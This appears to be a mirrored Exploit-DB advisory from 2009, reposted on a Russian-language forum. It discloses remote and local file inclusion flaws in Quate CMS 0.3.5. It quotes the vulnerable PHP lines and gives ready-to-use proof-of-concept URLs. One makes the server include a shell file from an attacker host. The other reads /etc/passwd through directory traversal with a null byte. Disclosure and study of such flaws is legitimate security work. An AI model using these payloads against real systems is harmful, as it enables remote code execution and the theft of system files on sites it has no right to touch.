- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10263
- Проверка EDB
-
- Пройдено
- Автор
- CR4WL3R
- Тип уязвимости
- WEBAPPS
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2009-12-01
Код:
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability
#Download Script : http://quate.net/quatecms
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)
# <?php
# if ($bypass_restrict != 1) {
# require_once($secure_page_path. "includes/secure.php");
# }
# ?>
#PoC : http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???
#
#
#########################################################################
#
#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)
# <?PHP
# if ($not_logged_in != 1) {
# if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {
# require_once("themes/" .$row_secure['account_theme']. "/footer.php");
# ?>
#PoC : http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]- Источник
- www.exploit-db.com
